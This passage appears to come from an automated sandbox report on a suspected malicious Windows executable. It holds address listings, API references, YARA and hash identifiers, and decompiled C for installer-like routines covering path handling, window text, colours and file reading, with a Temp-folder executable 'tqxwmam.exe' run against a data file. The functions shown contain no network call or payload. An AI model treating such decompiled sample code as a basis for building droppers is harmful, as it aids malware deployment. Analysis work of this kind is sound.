                                                    0x004068b8
                                                    0x004068bb
                                                    0x004068bd
                                                    0x004068bd
                                                    0x004068c6
                                                    0x004068c6
                                                    0x004068cc
                                                    0x004068cf
                                                    0x00406702
                                                    0x00000000
                                                    0x00406702
                                                    0x00000000
                                                    0x004068cf
                                                    0x00406727
                                                    0x0040672a
                                                    0x00406739
                                                    0x00406740
                                                    0x0040674c
                                                    0x0040674f
                                                    0x00406752
                                                    0x00406753
                                                    0x00406758
                                                    0x0040675e
                                                    0x00406761
                                                    0x00406764
                                                    0x00406857
                                                    0x0040685c
                                                    0x0040688f
                                                    0x00406894
                                                    0x00406899
                                                    0x0040689e
                                                    0x0040689e
                                                    0x004068a3
                                                    0x004068a9
                                                    0x004068ac
                                                    0x00000000
                                                    0x004068ac
                                                    0x0040685e
                                                    0x00406861
                                                    0x00406864
                                                    0x00406879
                                                    0x00406880
                                                    0x00406866
                                                    0x0040686d
                                                    0x0040686d
                                                    0x00406888
                                                    0x0040688b
                                                    0x0040684f
                                                    0x00406850
                                                    0x00406850
                                                    0x00000000
                                                    0x0040688b
                                                    0x00406771
                                                    0x00406775
                                                    0x00406775
                                                    0x00406776
                                                    0x00406778
                                                    0x004067b5
                                                    0x004067b8
                                                    0x004067c8
                                                    0x004067cb
                                                    0x004067d3
                                                    0x004067d9
                                                    0x004067d9
                                                    0x00406834
                                                    0x00406834
                                                    0x00406836
                                                    0x00000000
                                                    0x00000000
                                                    0x004067dd
                                                    0x004067e2
                                                    0x004067e3
                                                    0x004067e5
                                                    0x004067fc
                                                    0x0040680a
                                                    0x00406810
                                                    0x00406812
                                                    0x00406830
                                                    0x00406830
                                                    0x00406830
                                                    0x00000000
                                                    0x00406830
                                                    0x00406818
                                                    0x00406821
                                                    0x00406824
                                                    0x0040682a
                                                    0x0040682e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040682e
                                                    0x004067f6
                                                    0x004067f8
                                                    0x004067fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004067fa
                                                    0x00000000
                                                    0x00406834
                                                    0x004067c0
                                                    0x00000000
                                                    0x0040677a
                                                    0x00406798
                                                    0x004067a1
                                                    0x0040683e
                                                    0x00406842
                                                    0x0040684a
                                                    0x0040684a
                                                    0x00000000
                                                    0x00406842
                                                    0x004067ab
                                                    0x00406838
                                                    0x0040683c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040683c
                                                    0x00406778
                                                    0x00000000
                                                    0x00406705

                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,00000400), ref: 004067C0
                                                    • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                    • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                    • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: Directory$SystemWindowslstrcatlstrlen
                                                    • String ID: "C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                    • API String ID: 4260037668-783827037
                                                    • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                    • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                    • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                    • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                    0x004056d0
                                                    0x004056da
                                                    0x004056df
                                                    0x004056e5
                                                    0x004056f0
                                                    0x004056f3
                                                    0x004056f6
                                                    0x004056fc
                                                    0x004056fc
                                                    0x00405702
                                                    0x0040570a
                                                    0x0040570d
                                                    0x0040572a
                                                    0x0040572e
                                                    0x00405737
                                                    0x00405737
                                                    0x00405741
                                                    0x0040574a
                                                    0x00405756
                                                    0x0040575d
                                                    0x00405761
                                                    0x00405764
                                                    0x00405777
                                                    0x00405785
                                                    0x00405785
                                                    0x00405789
                                                    0x0040578b
                                                    0x0040578e
                                                    0x00000000
                                                    0x0040578e
                                                    0x0040570f
                                                    0x00405717
                                                    0x0040571f
                                                    0x00405725
                                                    0x00000000
                                                    0x00405725
                                                    0x0040571f
                                                    0x0040570d
                                                    0x0040579a

                                                    APIs
                                                    • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                    • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                    • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                    • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                      • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                      • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                    • String ID: ('B
                                                    • API String ID: 1495540970-2332581011
                                                    • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                    • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                    • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                    • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                    0x0040463d
                                                    0x004046f3
                                                    0x00000000
                                                    0x004046f3
                                                    0x0040464e
                                                    0x00404652
                                                    0x00000000
                                                    0x0040466c
                                                    0x0040466c
                                                    0x00404675
                                                    0x00000000
                                                    0x00000000
                                                    0x00404677
                                                    0x00404683
                                                    0x00404686
                                                    0x00404686
                                                    0x0040468c
                                                    0x00404692
                                                    0x00404692
                                                    0x0040469e
                                                    0x004046a4
                                                    0x004046ab
                                                    0x004046ae
                                                    0x004046b1
                                                    0x004046b3
                                                    0x004046b3
                                                    0x004046bb
                                                    0x004046c1
                                                    0x004046c1
                                                    0x004046cb
                                                    0x004046d0
                                                    0x004046d3
                                                    0x004046d8
                                                    0x004046db
                                                    0x004046db
                                                    0x004046eb
                                                    0x004046eb
                                                    0x00000000
                                                    0x004046ee

                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                    • GetSysColor.USER32(00000000), ref: 00404686
                                                    • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                    • SetBkMode.GDI32(?,?), ref: 0040469E
                                                    • GetSysColor.USER32(?), ref: 004046B1
                                                    • SetBkColor.GDI32(?,?), ref: 004046C1
                                                    • DeleteObject.GDI32(?), ref: 004046DB
                                                    • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                    • String ID:
                                                    • API String ID: 2320649405-0
                                                    • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                    • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                    • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                    • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                    0x004026ec
                                                    0x004026ee
                                                    0x004026f1
                                                    0x004026f3
                                                    0x004026f6
                                                    0x004026fb
                                                    0x004026ff
                                                    0x00402702
                                                    0x00402705
                                                    0x00402c2a
                                                    0x00402c2d
                                                    0x0040270b
                                                    0x0040270b
                                                    0x00402712
                                                    0x00402714
                                                    0x00402714
                                                    0x0040271a
                                                    0x0040287e
                                                    0x0040287e
                                                    0x00402881
                                                    0x00402886
                                                    0x004015b6
                                                    0x0040292e
                                                    0x0040292e
                                                    0x00000000
                                                    0x00402720
                                                    0x00402721
                                                    0x0040272c
                                                    0x0040272f
                                                    0x0040273b
                                                    0x0040273f
                                                    0x004027d7
                                                    0x004027ef
                                                    0x004027ff
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00402745
                                                    0x00402745
                                                    0x00402748
                                                    0x00402749
                                                    0x0040274c
                                                    0x00402751
                                                    0x00402758
                                                    0x00402760
                                                    0x00000000
                                                    0x00402766
                                                    0x00402766
                                                    0x0040276b
                                                    0x00000000
                                                    0x00402771
                                                    0x00402771
                                                    0x00402779
                                                    0x0040277c
                                                    0x0040277f
                                                    0x0040283a
                                                    0x00402841
                                                    0x00402785
                                                    0x0040278b
                                                    0x00402797
                                                    0x00402801
                                                    0x00402801
                                                    0x00402799
                                                    0x00402799
                                                    0x0040279c
                                                    0x0040279e
                                                    0x0040279e
                                                    0x0040279e
                                                    0x004027a1
                                                    0x004027a6
                                                    0x004027a9
                                                    0x00000000
                                                    0x00000000
                                                    0x004027ab
                                                    0x004027ae
                                                    0x004027bc
                                                    0x004027c2
                                                    0x004027d0
                                                    0x00000000
                                                    0x004027d2
                                                    0x00000000
                                                    0x004027d2
                                                    0x00000000
                                                    0x004027d0
                                                    0x0040279e
                                                    0x00402804
                                                    0x00402807
                                                    0x00000000
                                                    0x00402809
                                                    0x0040280e
                                                    0x0040284f
                                                    0x00402871
                                                    0x00402878
                                                    0x0040285d
                                                    0x0040285d
                                                    0x00402860
                                                    0x00402863
                                                    0x00402866
                                                    0x00402866
                                                    0x00000000
                                                    0x00402817
                                                    0x00402817
                                                    0x0040281a
                                                    0x0040281d
                                                    0x00402823
                                                    0x00402827
                                                    0x0040282a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040282a
                                                    0x0040280e
                                                    0x00402807
                                                    0x0040277f
                                                    0x0040276b
                                                    0x00402760
                                                    0x00000000
                                                    0x0040282c
                                                    0x0040282c
                                                    0x0040282f
                                                    0x00402838
                                                    0x00000000
                                                    0x0040272f
                                                    0x0040271a
                                                    0x00402c33
                                                    0x00402c39

                                                    APIs
                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                      • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                    • String ID: 9
                                                    • API String ID: 163830602-2366072709
                                                    • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                    • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                    • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                    • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                    0x004068f1
                                                    0x004068fa
                                                    0x00406911
                                                    0x00406911
                                                    0x00406918
                                                    0x00406924
                                                    0x00406924
                                                    0x00406927
                                                    0x0040692a
                                                    0x0040692f
                                                    0x00406931
                                                    0x0040693a
                                                    0x0040693e
                                                    0x0040695b
                                                    0x00406963
                                                    0x00406963
                                                    0x00406968
                                                    0x0040696a
                                                    0x0040696d
                                                    0x00406972
                                                    0x00406973
                                                    0x00406977
                                                    0x00406977
                                                    0x00406978
                                                    0x0040697f
                                                    0x00406981
                                                    0x00406988
                                                    0x00000000
                                                    0x00000000
                                                    0x00406990
                                                    0x00406996
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406996
                                                    0x0040699b

                                                    APIs
                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                    • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                    • CharNextW.USER32(?,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                    • CharPrevW.USER32(?,?,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: Char$Next$Prev
                                                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 589700163-1201062745
                                                    • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                    • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                    • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                    • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                    Uniqueness

